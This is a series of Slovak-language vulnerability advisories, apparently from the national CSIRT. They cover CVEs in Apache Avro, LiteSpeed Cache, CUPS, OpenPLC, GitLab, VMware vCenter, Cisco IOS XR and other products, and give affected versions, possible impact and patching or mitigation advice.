Vývojári Apache Avro Java SDK vydali aktualizácie svojho produktu, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2024-47561 spočíva v nesprávnom spracovaní používateľských schém v rámci direktív ReflectData a SpecificData a útočník by ju prostredníctvom podvrhnutia špeciálne vytvorenej schémy mohol zneužiť na vykonanie škodlivého kódu.

Zraniteľnosť objavil výskumník Kostya Kortchinsky z tímu Databricks Security Team.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia Apache Avro Java SDK na verziu 1.11.4 alebo 1.12.0.

Pre mitigovanie zraniteľnosti môžete zakázať spracovanie používateľských schém alebo ich pred spracovaním sanitizovať.

Odkazy:

Mesačný prehľad kritických zraniteľností september 2024

Marian Danko — Tue, 08 Oct 2024 06:24:48 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci september 2024.

Mesačný prehľad – 09/2024 PDF (619 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Zraniteľnosť WordPress LiteSpeed Cache umožňuje stored XSS

Marian Danko — Tue, 08 Oct 2024 06:20:38 +0000

Vývojári pluginu WordPress LiteSpeed Cache vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť súvisiacu s absentujúcou sanitizáciou parametrov z HTTP požiadaviek. Tieto plugin preberá a ukladá na administrátorskú stránku, čo vedie k možnosti vykonávať útoky typu stored XSS.

Zraniteľné systémy:

WordPress LiteSpeed Cache 6.5.0.2 a staršie

Opis činnosti:

CVE-2024-47374 (CVSS skóre 7,1)

Vývojári pluginu WordPress LiteSpeed Cache vydali bezpečnostné aktualizácie, ktoré opravili vysoko závažnú zraniteľnosť. CVE-2024-47374 spočíva v nesprávnej sanitizácii poľa X-LSCACHE-VARY-VALUE v HTTP hlavičkách, ktorého hodnotu preberá funkcia „Vary Group“ a publikuje ju na administrátorskej stránke. Vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorenej HTTP požiadavky mohol zneužiť na realizáciu útokov typu Stored XSS (Cross Site Scripting) a následne získanie neoprávneného prístupu k citlivým údajom a eskaláciu privilégií. Zraniteľnosť je možné zneužiť len na systémoch, na ktorých sú súčasne aktivované funkcie “CSS Combine” a “Generate UCSS”.

Možné škody:

Eskalácia privilégií
Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia WordPress LiteSpeed Cache na verziu 6.5.1.

Odkazy:

https://patchstack.com/articles/unauthenticated-stored-xss-vulnerability-in-litespeed-cache-plugin-affecting-6-million-sites/

https://nvd.nist.gov/vuln/detail/CVE-2024-47374

https://thehackernews.com/2024/10/wordpress-litespeed-cache-plugin.html

Kritické zraniteľnosti v IDS/IPS Suricata

Marian Danko — Tue, 08 Oct 2024 06:18:27 +0000

Vývojári IDS/IPS systému a sieťového analyzátora Suricata vydali aktualizáciu svojho produktu, ktorá opravuje šesť zraniteľností, z čoho tri sú označené ako kritické. Zraniteľnosti možno zneužiť na obídenie bezpečnostných mechanizmov, vzdialené vykonanie škodlivého kódu a zneprístupnenie služby.

Zraniteľné systémy:

Suricata, verzie staršie ako 7.0.7

Opis činnosti:

Nová verzia IDS/ IPS Suricata opravuje tri kritické a tri vysoko závažné zraniteľnosti. Žiadne bližšie informácie neboli zverejnené.

CVE-2024-45797 (kritická)

CVE-2024-47187 (kritická)

CVE-2024-47188 (kritická)

CVE-2024-47522 (vysoko závažná)

CVE-2024-45795 (vysoko závažná)

CVE-2024-45796 (vysoko závažná)

Možné škody:

Vzdialené vykonávanie kódu
Nedostupnosť služby (DoS)

Odporúčania:

Bezodkladná aktualizácia Suricata na verziu 7.0.7.

Odkazy:

https://suricata.io/2024/10/01/suricata-7-0-7-released/

Zraniteľnosti v tlačovom subsystéme pre Unix a Linux možno zneužiť na vzdialené vykonanie kódu

Marian Danko — Mon, 30 Sep 2024 12:08:13 +0000

Implementácia internetového tlačového protokolu IPP pre unixové systémy CUPS obsahuje 4 zraniteľnosti, z ktorých jedna je označená ako kritická. Zreťazením zraniteľností by vzdialený neautentifikovaný útočník mohol získať kontrolu nad parametrami v súbore PPD a možnosť vzdialene vykonávať kód.

Zraniteľné systémy:

cups-filters 2.0.1 a staršie
libcupsfilters 2.1b1 a staršie
libppd 2.1b1 a staršie
cups-browsed 2.0.1 a staršie

Tieto služby sú prítomné na väčšine unixových systémov, vrátane väčšiny distribúcií GNU/Linux, BSD, Solaris a Chromium/ChromeOS.

Opis činnosti:

Modulárny tlačový subsystém CUPS (Common UNIX Printing System) pre operačné systémy na báze Unix, ktorý je implementáciou protokolu IPP (Internet Printing Protocol), obsahuje 1 kritickú a 3 vysoko závažné zraniteľnosti. Ich kombináciou môže vzdialený neautentifikovaný útočník dosiahnuť schopnosť vzdialene vykonávať kód na zariadení, odkiaľ bola spustená tlačová úloha. Vzhľadom na povahu CUPS môže útočník zneužiť zraniteľnosti priamo z internetu.

CVE-2024-47177 (CVSS skóre 9,0)

Kritická zraniteľnosť v cups-filters. Tlačový filter foomatic-rip umožňuje vykonávať ľubovoľné príkazy vo FoomaticRIPCommandLine. Útočník na to môže zneužiť hodnoty v súbore PPD, ktorý ich posúva konzole.

CVE-2024-47076 (CVSS skóre 8,6)

Vysoko závažná zraniteľnosť v knižnici libcupsfilters. Chýbajúca sanitizácia a validácia atribútov prijímaných zo servera IPP vo funkcii cfGetPrinterAttributes5 umožňuje útočníkovi podvrhnúť dáta ďalším súčastiam systému CUPS.

CVE-2024-47175 (CVSS skóre 8,6)

Vysoko závažná zraniteľnosť v libppd. Vo funkcii ppdCreatePPDFromIPP2 chýba sanitizácia a validácia IPP atribútov zapisovaných do súboru PPD, čo umožňuje útočníkom kontrolovať obsah súboru PPD.

CVE-2024-47176 (CVSS skóre 8,3)

Vysoko závažná zraniteľnosť v cups-browsed. Tento komponent CUPS počúva na UDP porte 631 bez kontroly zdroja komunikácie. Útočník tak môže spôsobiť vykonanie požiadavky Get-Printer-Attributes IPP z URL adresy, ktorú má pod kontrolou.

Možné škody:

Vzdialené vykonávanie príkazov a kódu

Odporúčania:

Na uvedené zraniteľnosti v súčasnosti nie sú dostupné aktualizácie. Odporúčame sledovať stránku výrobcu a po vydaní aktualizácií bezodkladne vykonať aktualizáciu zasiahnutých systémov.

Pre mitigáciu zraniteľností odporúčame zakázať a odobrať službu cups-browsed, alebo na firewalle blokovať sieťovú komunikáciu na UDP port 631 a komunikáciu súvisiacu s protokolmi zeroconf, mDNS a DNS-SD.

Odkazy:

Kritická a závažné zraniteľnosti OpenPLC

Marian Danko — Fri, 27 Sep 2024 13:55:17 +0000

Kyberbezpečnostná jednotka Talos spoločnosti Cisco zverejnila podrobnosti o viacerých opravených zraniteľnostiach v programovateľnom logickom ovládači OpenPLC, ktoré možno zneužiť pri útokoch DoS a na vzdialené vykonávanie kódu.

Zraniteľné systémy:

OpenPLC _v3 b4702061dc14d1024856f71b4543298d77007b88
OpenPLC _v3 16bf8bac1a36d95b73e7b8722d0edb8b9c5bb56a

Opis činnosti:

CVE-2024-34026 (CVSS skóre 9,8)

Kritická zraniteľnosť označená ako CVE-2024-34026 sa nachádza v parseri EtherNet/IP prostredia OpenPLC Runtime (verzia OpenPLV_v3 b4702061dc14d1024856f71b4543298d77007b88). Chyba spočíva v nedostatočnej kontrole veľkosti alokovanej pamäte pre uloženie záznamu o požiadavke, čo vedie k možnosti spôsobiť pretečenie zásobníka. Útočník môže odoslať špeciálne vytvorenú sériu požiadaviek EtherNet/IP, a tak získať schopnosť vzdialene vykonávať kód.

CVE-2024-36980, CVE-2024-36981, CVE-2024-39589, CVE-2024-39590 (CVSS skóre 7,5)

Zraniteľnosti sa nachádzajú v parseri EtherNet/IP PCCC prostredia OpenPLC Runtime. Odoslaním špeciálne vytvorených požiadaviek EtherNet/IP môže útočník spôsobiť odmietnutie služby (DoS).

CVE-2024-36980 a CVE-2024-36981 (OpenPLC _v3 b4702061dc14d1024856f71b4543298d77007b88) umožňujú čítanie mimo povolený rozsah pamäte.
CVE-2024-39589 a CVE-2024-39590 (OpenPLC _v3 16bf8bac1a36d95b73e7b8722d0edb8b9c5bb56a) súvisia s nesprávnou dereferenciou ukazovateľa.

Možné škody:

Nedostupnosť služby (DoS)
Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia na najnovšiu verziu OpenPLC.
Pokiaľ nemôžete aktualizovať na najnovšiu verziu, Cisco Talos odporúča pre zraniteľnosti CVE-2024-36981 a CVE-2024-36980 upraviť zdrojový kód tak, aby sa v dotknutom porovnávaní typ -1 zmenil na zodpovedajúci typ.

uint16_t newPcccSize = processPCCCMessage(pcccData, currentPcccSize); if (newPcccSize == (uint16_t) -1) return -1;

Pre zmiernenie zraniteľností CVE-2024-39589 a CVE-2024-39590 upravte zdrojový kód tak, aby ste odstránili tri pretypovania ukazovateľov vo volaniach Protected_Logical_Write_Reply memmove.

memmove(&buffer[0], header.RP_CMD_Code, 1); memmove(&buffer[1], header.HD_Status, 1); memmove(&buffer[2], header.HD_TransactionNum, 2);

Odkazy:

Útočníci zneužívajú kritickú zraniteľnosť Ivanti Cloud Services Appliance

Marian Danko — Fri, 20 Sep 2024 10:48:29 +0000

Spoločnosť Ivanti informovala o novej kritickej zraniteľnosti v produkte CSA, ktorá umožňuje získať prístup ku chráneným funkcionalitám. Útočníci ju zneužívajú v kombinácii s nedávno publikovanou zraniteľnosťou umožňujúcou vzdialené vykonávanie kódu.

Zraniteľné systémy:

Ivanti CSA (Cloud Services Appliance) verzia 4.6 pred Patch 519

Opis činnosti:

CVE-2024-8963 (CVSSv3.0 skóre 9,4)

Spoločnosť IVANTI vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť v produkte Cloud Services Appliance. CVE-2024-8963 je chyba typu path traversal. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na obídenie mechanizmov autentifikácie a získanie prístupu k administrátorským funkcionalitám CSA.

Útočníci zraniteľnosť aktívne zneužívajú v kombinácii so zraniteľnosťou CVE-2024-8190, ktorá bola opravená už 10. septembra 2024. Chyba umožňovala injektovať systémové príkazy a vzdialene vykonávať kód, pokiaľ mal útočník administrátorský prístup k zariadeniu. Zraniteľnosť CVE-2024-8963 však dovoľuje túto podmienku obísť.

Možné škody:

Eskalácia oprávnení
Prístup ku chráneným zdrojom

Odporúčania:

Bezodkladná aktualizácia na verziu Ivanti CSA 4.6 Patch 519 alebo CSA 5.0, vzhľadom na to, že verzia 4.6 už nie je podporovaná.

Spoločnosť Ivanti odporúča v CSA kontrolu používateľov, či nedošlo ku zmene alebo pridaniu nových účtov. Pre zníženie rizika odporúča nakonfigurovať dual homing s rozhraním eth0 ako internou sieťou a nasadiť EDR.

Odkazy:

Kritická zraniteľnosť GitLab

Marian Danko — Thu, 19 Sep 2024 14:46:22 +0000

Spoločnosť GitLab vydala aktualizáciu opravujúcu kritickú zraniteľnosť, ktorá zasahuje autentifikačný proces na báze štandardu SAML. Chyba umožňuje neoverenému útočníkovi obísť prihlásenie.

Zraniteľné systémy:

GitLab Community Edition (CE) staršie ako 17.3.3, 17.2.7, 17.1.8, 17.0.8 a 16.11.10
GitLab Enterprise Edition (EE) staršie ako 17.3.3, 17.2.7, 17.1.8, 17.0.8 a 16.11.10

Opis činnosti:

CVE-2024-45409 (CVSS skóre 10,0)

Kritická zraniteľnosť CVE-2024-45409 súvisí s chybami v knižniciach omniauth-saml a ruby-saml, ktoré GitLab využíva v rámci autentifikácie na báze štandardu SAML (Security Assertion Markup Language). Knižnice nesprávne overujú podpis SAML odpovede. Neautentifikovaný útočník s prístupom k podpísanému dokumentu SAML tak môže vytvoriť falošnú odpoveď a prihlásiť sa ako ľubovoľný používateľ.
Zraniteľnosť zasahuje iba inštancie s nastavenou autentifikáciou pomocou SAML.

Možné škody:

Obchádzanie bezpečnostných prvkov

Odporúčania:

Bezodkladná aktualizácia na verziu 17.3.3, 17.2.7, 17.1.8, 17.0.8 alebo 16.11.10. Tieto záplaty aktualizujú závislosti omniauth-saml na verziu 2.2.1 a ruby-saml na 1.17.0.

Pokiaľ aktualizácia nie je možná, vynúťte dvojfaktorovú autentifikáciu pre všetkých používateľov. Zároveň zakážte možnosť, aby ju prihlasovanie prostredníctvom SAML obchádzalo.

Preveriť potenciálnu úspešnú kompromitáciu môžete v logoch application_json a auth_json, kde bude zaznamenaná hodnota extern_id a extern_uid, ktorú útočník použil. Znakom zneužitia zraniteľnosti môžu byť aj chýbajúce alebo nesprávne informácie v položke attributes v súbore auth_json.

Odkazy:

Google Chrome prestáva od novembra 2024 dôverovať certifikátom Entrust

Marian Danko — Wed, 18 Sep 2024 13:22:09 +0000

V dnešnej dobe je zabezpečené spojenie s webovým serverom (prostredníctvom HTTPS) základom ochrany súkromia a bezpečnosti používateľov. Táto ochrana je zabezpečená certifikátmi, ktoré vydáva certifikačná autorita (CA). Certifikačná autorita zohráva kľúčovú úlohu pri dôveryhodnosti certifikátov. Od novembra 2024 však prehliadač Google Chrome prestane dôverovať certifikátom vydaným certifikačnou autoritou Entrust. Toto rozhodnutie bude mať výrazný dopad na webové stránky, ktoré používajú certifikáty od Entrust a ich používateľov.

Prečo Google Chrome prestane dôverovať Entrust?

Google sa rozhodol pre tento krok kvôli opakujúcim sa zlyhaniam a nedostatkom, ktoré u spoločnosti Entrust pozoroval počas uplynulých šiestich rokov. Konkrétne ide o:

Zlyhania pri dodržiavaní predpisov: Entrust nedodržal niektoré zo základných bezpečnostných a prevádzkových štandardov stanovených v rámci politiky programu Chrome Root.
Nesplnené záväzky: Spoločnosť Entrust nesplnila svoje sľuby týkajúce sa zlepšenia bezpečnostných opatrení.
Nedostatočný pokrok: Spoločnosť Entrust nedokázala presvedčivo riešiť zraniteľnosti, ktoré boli identifikované v jej verejných správach o incidentoch.

Tieto problémy oslabili dôveru spoločnosti Google v schopnosť spoločnosti Entrust správať sa ako spoľahlivá a dôveryhodná certifikačná autorita. Google tak vyhodnotil, že ďalšie uznávanie certifikátov Entrust predstavuje riziko pre bezpečnosť používateľov internetu.

Kedy sa zmena uskutoční?

Tento krok vstúpi do platnosti s aktualizáciou prehliadača Chrome 131, približne 12. novembra 2024. Po tomto dátume nebudú nové certifikáty vydané spoločnosťou Entrust automaticky dôveryhodné v prehliadači Chrome.

Ako to ovplyvní používateľov?

Po nadobudnutí účinnosti tohto opatrenia budú všetky webové stránky používajúce certifikáty vydané spoločnosťou Entrust po 11. novembri 2024 označené v prehliadači Chrome ako “nebezpečné”. Používatelia budú pri pokuse o prístup na takéto stránky varovaní správou, ako napríklad “Vaše pripojenie nie je súkromné.” To môže výrazne ovplyvniť reputáciu webových stránok a odradiť návštevníkov od ich používania. Staršie certifikáty, ktoré boli vydané pred týmto dátumom, zostanú dôveryhodné až do ich uplynutia.

Aké webové stránky sú týmto opatrením ovplyvnené?

Dopad na jednotlivé webové stránky závisí od toho, ako rýchlo prejdú na certifikáty inej dôveryhodnej certifikačnej autority. Webové stránky, ktoré naďalej používajú certifikáty spoločnosti Entrust vydané po 11. novembri 2024, budú označené ako nedôveryhodné. Ak si nie ste istí, akú certifikačnú autoritu používa váš web, môžete to jednoducho skontrolovať pomocou prehliadača Chrome:

Otvorte webovú stránku vo vašom prehliadači.
Kliknite na ikonu “zámok” v paneli s adresou.
Vyberte “Pripojenie je zabezpečené” a následne “Certifikát je platný”.
V časti “Vydané od” skontrolujte, či sa v poli “Organizácia (O)” nachádza “Entrust” alebo “AffirmTrust.” Ak áno, odporúčame vykonať potrebné kroky na prechod k inej certifikačnej autorite.

Čo by mali robiť prevádzkovatelia webových stránok?

Weboví operátori, ktorých sa táto zmena týka, by mali čo najskôr prejsť na novú verejne dôveryhodnú certifikačnú autoritu. Prechod by sa mal dokončiť pred vypršaním platnosti existujúcich certifikátov, najmä ak je ich platnosť naplánovaná po 11. novembri 2024.

Prevádzkovatelia môžu dočasne získať nový TLS certifikát od spoločnosti Entrust, aby oddialili dopad blokovania, ale časom budú musieť prejsť na certifikát od inej autority, ktorá je zahrnutá v Chrome Root Store.

Dôležitosť a možné dopady

Táto zmena je dôležitá, pretože certifikačné autority sú zodpovedné za zabezpečenie bezpečných šifrovaných pripojení medzi prehliadačmi a webovými stránkami. Ak CA neplní svoje povinnosti a nezaručuje bezpečnosť, môže to ohroziť súkromie a bezpečnosť používateľov internetu. Google preto trvá na dodržiavaní najvyšších štandardov bezpečnosti.

Upozornenie pre používateľov:

Od novembra môžu byť niektoré webové stránky označené ako nedôveryhodné. V takom prípade odporúčame byť opatrní a na stránkach nezadávať citlivé informácie, kým nedôjde k vyriešeniu problému s certifikátom.

Webové stránky a ich operátori by mali prijať okamžité kroky, aby sa vyhli negatívnemu dopadu na dôveryhodnosť ich webov a ochranu svojich návštevníkov.

Zdroje:

https://security.googleblog.com/2024/06/sustaining-digital-certificate-security.html?m=1

Kritická aktívne zneužívaná zraniteľnosť VMware vCenter Server

Marian Danko — Wed, 18 Sep 2024 13:16:02 +0000

Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, opravujúce bezpečnostné chyby ovplyvňujúce VMware vCenter Server. Z nich 1 je označená ako kritická a 1 vysoko závažná. Zraniteľnosti možno zneužiť na eskaláciu privilégií a vzdialené vykonanie kódu. Zraniteľnosti sú aktívne zneužívané.
[Aktualizované 20.11.2024]

Zraniteľné systémy:

VMware vCenter Server 7.0, 8.0
VMware Cloud Foundation 4.x, 5.x, 5.1.x

Poznámka: vCenter Server je tiež súčasťou produktov VMware vSphere a VMware Cloud Foundation

Opis činnosti:

CVE-2024-38812 (CVSS skóre 9,8)
Chybu pretečenia haldy v implementácii protokolu DCE/RPC by vzdialený neautentifikovaný útočník mohol zneužiť na vykonanie škodlivého kódu. Zraniteľnosť možno zneužiť odoslaním špeciálne vytvoreného paketu.
Aktualizácia 25.10.2024: Spoločnosť Broadcom vydala ďalšie bezpečnostné aktualizácie pre opravu kritickej zraniteľnosti CVE-2024-38812, ktorá bola nedostatočne opravená v septembri 2024.

CVE-2024-38813 (CVSS skóre 7,5)
Vysoko závažná zraniteľnosť CVE-2024-38813 umožňuje útočníkovi so sieťovým prístupom zvýšiť oprávnenia na úroveň root prostredníctvom odoslania špeciálne vytvoreného paketu.

Aktualizácia 20.11.2024: Spoločnosť Broadcom informovala o aktívnom zneužívaní oboch zraniteľností.

Možné škody:

Vzdialené vykonávanie kódu
Zvýšenie privilégií

Odporúčania:

Bezodkladná aktualizácia VMware vCenter Server na verzie 8.0 U3d, 8.0 U2e, 7.0 U3t. Keďže je vCenter Server súčasťou VMware Cloud Foundation, výrobca odporúča aj inštaláciu aktualizácií KB88287.

Odkazy:

Kritické zraniteľnosti routerov D-Link

Marian Danko — Wed, 18 Sep 2024 13:10:05 +0000

Spoločnosť D-Link opravila tri kritické a dve vysoko závažné zraniteľnosti vo firmvéroch zariadení COVR-X1870, DIR-X4860 a DIR-X5460. Zraniteľnosti súvisia s napevno kódovanými prihlasovacími údajmi a ďalšími chybami, ktoré umožňujú vzdialene vykonávať kód, pristupovať k zariadeniam cez Telnet a vykonávať systémové príkazy.

Zraniteľné systémy:

COVR-X1870 rev.Ax, (non-US) firmware verzia 1.02 a staršie
DIR-X4860 rev.Ax, firmware verzia 1.04B04_Hot-Fix a staršie
DIR-X5460 rev.Ax, firmware verzia 1.11B01_Hot-Fix a staršie

Opis činnosti:

Spoločnosť D-Link opravila kritické zraniteľnosti v troch routeroch (COVR-X1870, DIR-X4860 a DIR-X5460). Dve z chýb umožňujú vzdialene vykonávať kód a tri dovoľujú prístup ku zariadeniam s napevno kódovanými prihlasovacími údajmi.

CVE-2024-45694, CVE-2024-45695 (CVSS skóre 9,8)

Zraniteľnosti pretečenia medzipamäte na zásobníku, ktoré umožňujú neautentifikovaným útočníkom vzdialene vykonávať kód.

CVE-2024-45697 (CVSS skóre 9,8)

Zraniteľnosť súvisí s povolením protokolu telnet, keď je zapojený port WAN. Útočník tak môže získať prístup s použitím prihlasovacích údajov napevno zadaných v zdrojovom kóde.

CVE-2024-45696 , CVE-2024-45698 (CVSS skóre 8,8)

Prvá zraniteľnosť útočníkom umožňuje pomocou napevno kódovaných prihlasovacích údajov vynútiť povolenie telnetu na lokálnej sieti. Druhá im následne umožňuje vzdialene sa prihlásiť spomenutými prihlasovacími údajmi a vykonávať systémové príkazy, kvôli nedostatočnej kontrole používateľských vstupov.

Zraniteľnosti objavil tím TWCERT.

Možné škody:

Vzdialené vykonávanie kódu
Kompromitácia zariadení

Odporúčania:

Bezodkladná aktualizácia na

COVR-X1870 rev.Ax, firmware verzia v1.03B01
DIR-X4860 rev.Ax, firmware verzia v1.04B05
DIR-X5460 rev.Ax, firmware verzia DIR-X5460A1_V1.11B04

Odkazy:

Mesačná správa CSIRT.SK – august 2024

Marian Danko — Mon, 16 Sep 2024 09:01:07 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci august 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 08/2024 PDF (1 728 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Vysoko závažné zraniteľnosti v Cisco IOS XR

Marian Danko — Mon, 16 Sep 2024 08:50:37 +0000

Spoločnosť CISCO vydala bezpečnostné aktualizácie na svoj operačný systém IOS XR, ktoré opravujú 8 zraniteľností, z čoho 6 je označených ako vysoko závažné. Zraniteľnosti s označením CVE-2024-20398, CVE-2024-20304, CVE-2024-20483, CVE-2024-20489, CVE-2024-20317 a CVE-2024-20406 možno zneužiť na injekciu príkazov, vykonanie škodlivého kódu, eskaláciu privilégií, zneprístupnenie služby a získanie neoprávneného prístupu k citlivým údajom.

Zraniteľné systémy:

Cisco IOS XR vo verziách starších ako 7.11.21 (október 2024)
Cisco IOS XR vo verziách starších ako 24.2.2

Pozn. Konkrétne typy zasiahnutých zariadení a platforiem nájdete na stránkach výrobcu v časti „Affected Products“.

Opis zraniteľnosti:

CVE-2024-20398 (CVSS skóre 8,8)

Zraniteľnosť sa nachádza v príkazovom riadku a spočíva v nedostatočnom overovaní používateľských vstupov. Lokálny autentifikovaný útočník by ju prostredníctvom špeciálne vytvorených príkazov mohol zneužiť na eskaláciu privilégií na úroveň používateľa root.

CVE-2024-20304 (CVSS skóre 8,6)

Uvedenú zraniteľnosť by vzdialený neautentifikovaný útočník vedel zneužiť na zneprístupnenie služby. Nachádza sa vo funkcii Mtrace2 a spočíva v nesprávnom spracovaní obsahu pamäte UDP paketov.

CVE-2024-20483, CVE-2024-20489 (CVSS skóre 8,4)

Komponent Routed Passive Optical Network (PON) Controller obsahuje zraniteľnosti, ktoré by lokálny autentifikovaný útočník mohol zneužiť na injekciu príkazov a vykonanie škodlivého kódu. Zraniteľnosti je možné zneužiť na zariadeniach, na ktorých je aktivovaná funkcia Routed PON Controller.

CVE-2024-20317 (CVSS skóre 7,4)

Zraniteľnosť spočíva v nesprávnej klasifikácii určitých typov Ethernetových rámcov a neautentifikovaný útočník nachádzajúci sa v rovnakom sieťovom segmente by ju mohol zneužiť na zneprístupnenie služby.

CVE-2024-20406 (CVSS skóre 7,4)

CVE-2024-20406 spočíva v nedostatočnom overovaní vstupov v prichádzajúcich IS-IS (Intermediate System-to-Intermediate System) paketoch a možno ju zneužiť na zneprístupnenie služby.

Možné škody:

Eskalácia privilégií
Zneprístupnenie služby
Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom

Odporúčania:

Administrátorom a používateľom odporúčame vykonať aktualizáciu zasiahnutých systémov.

Zdroje:

https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-priv-esc-CrG5vhCq

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-pak-mem-exhst-3ke9FeFy

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-ponctlr-ci-OHcHmsFL

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-l2services-2mvHdNuC https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-isis-xehpbVNe

GitLab opravuje kritickú a vysoko závažné zraniteľnosti

Marian Danko — Fri, 13 Sep 2024 15:26:39 +0000

Spoločnosť GitLab vydala opravný balík pre 18 zraniteľností. Z toho jedna je hodnotená ako kritická a tri ako vysoko závažné. Chyby umožňujú vzdialene vykonávať príkazy, spôsobiť nedostupnosť služby alebo vykonať útoky typu SSRF (Server-side request forgery).

Zraniteľné systémy:

GitLab Community Edition (CE) staršie ako 17.3.2, 17.2.5, 17.1.7
GitLab Enterprise Edition (EE) staršie ako 17.3.2, 17.2.5, 17.1.7

Opis zraniteľnosti:

CVE-2024-6678 (CVSSv3.1 skóre 9,9)

Kritická zraniteľnosť GitLab CE a EE, ktorá umožňuje útočníkovi spustiť pipeline s oprávneniami ľubovoľného používateľa. Vzdialený útočník môže vykonať akciu „stop“.

CVE-2024-8640 (CVSSv3.1 skóre 8,5), CVE-2024-8635 (CVSSv3.1 skóre 7,7), CVE-2024-8124 (CVSSv3.1 skóre 7,5)

Vysoko závažné zraniteľnosti GitLab. Prvé dve umožňujú vo verzii EE kvôli nedostatočnému overovaniu vstupov injektovať príkazy cez konfiguráciu YAML do pripojeného serveru Cube a pomocou útoku SSRF vykonávať cez Maven Dependency Proxy URL požiadavky na vnútorné zdroje. Posledná chyba zasahuje verziu EE aj CE a dovoľuje spôsobiť nedostupnosť služby, keď útočník zašle dostatočne veľký parameter glm_source.

Možné škody:

Vzdialené vykonávanie príkazov
Nedostupnosť služby

Odporúčania:

Platformy GitLab.com a GitLab Dedicated sú voči vyššie uvedeným zraniteľnostiam už zabezpečené. Ak spravujete svoju vlastnú inštanciu GitLab, odporúčame bezodkladnú aktualizáciu na

GitLab Community Edition (CE) 17.3.2, 17.2.5 alebo 17.1.7
GitLab Enterprise Edition (EE) 17.3.2, 17.2.5 alebo 17.1.7

Zdroje:

Microsoft v rámci septembrového Patch Tuesday opravil 7 kritických zraniteľností

Marian Danko — Thu, 12 Sep 2024 09:26:48 +0000

Spoločnosť Microsoft vydala v septembri 2024 balík opráv pre portfólio svojich produktov opravujúci 79 zraniteľností, z ktorých 19 umožňuje vzdialené vykonávanie kódu. Kritické zraniteľnosti sa nachádzajú v produktoch Microsoft SharePoint Server, Azure Web Apps a Azure Stack Hub a v komponentoch Windows Network Address Translation a Microsoft Windows Update a možno ich zneužiť na eskaláciu privilégií a vzdialené vykonanie škodlivého kódu. Zraniteľnosti s označením CVE-2024-38014, CVE-2024-38217, CVE-2024-38226, CVE-2024-43491 v Microsoft Publisher a komponentoch Windows Installer, MOTW (Mark of the Web) a Windows Update sú aktívne zneužívané útočníkmi.

Zraniteľné systémy:

Azure CycleCloud 8.0.0
Azure CycleCloud 8.0.1
Azure CycleCloud 8.0.2
Azure CycleCloud 8.1.0
Azure CycleCloud 8.1.1
Azure CycleCloud 8.2.0
Azure CycleCloud 8.2.1
Azure CycleCloud 8.2.2
Azure CycleCloud 8.3.0
Azure CycleCloud 8.4.0
Azure CycleCloud 8.4.1
Azure CycleCloud 8.4.2
Azure CycleCloud 8.5.0
Azure CycleCloud 8.6.0
Azure CycleCloud 8.6.1
Azure CycleCloud 8.6.2
Azure CycleCloud 8.6.3
Azure Network Watcher VM Extension for Windows
Azure Stack Hub
Azure Web Apps
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft AutoUpdate for Mac
Microsoft Dynamics 365 (on-premises) version 9.1
Microsoft Dynamics 365 Business Central 2023 Release Wave 1
Microsoft Dynamics 365 Business Central 2023 Release Wave 2
Microsoft Dynamics 365 Business Central 2024 Release Wave 1
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft Office Online Server
Microsoft Office for Android
Microsoft Office for Universal
Microsoft Publisher 2016 (32-bit edition)
Microsoft Publisher 2016 (64-bit edition)
Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 (GDR)
Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 Azure Connect Feature Pack
Microsoft SQL Server 2017 for x64-based Systems (CU 31)
Microsoft SQL Server 2017 for x64-based Systems (GDR)
Microsoft SQL Server 2019 for x64-based Systems (CU 28)
Microsoft SQL Server 2019 for x64-based Systems (GDR)
Microsoft SQL Server 2022 for x64-based Systems (CU 14)
Microsoft SQL Server 2022 for x64-based Systems (GDR)
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft Visio 2016 (32-bit edition)
Microsoft Visio 2016 (64-bit edition)
Outlook for iOS
Power Automate for Desktop
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
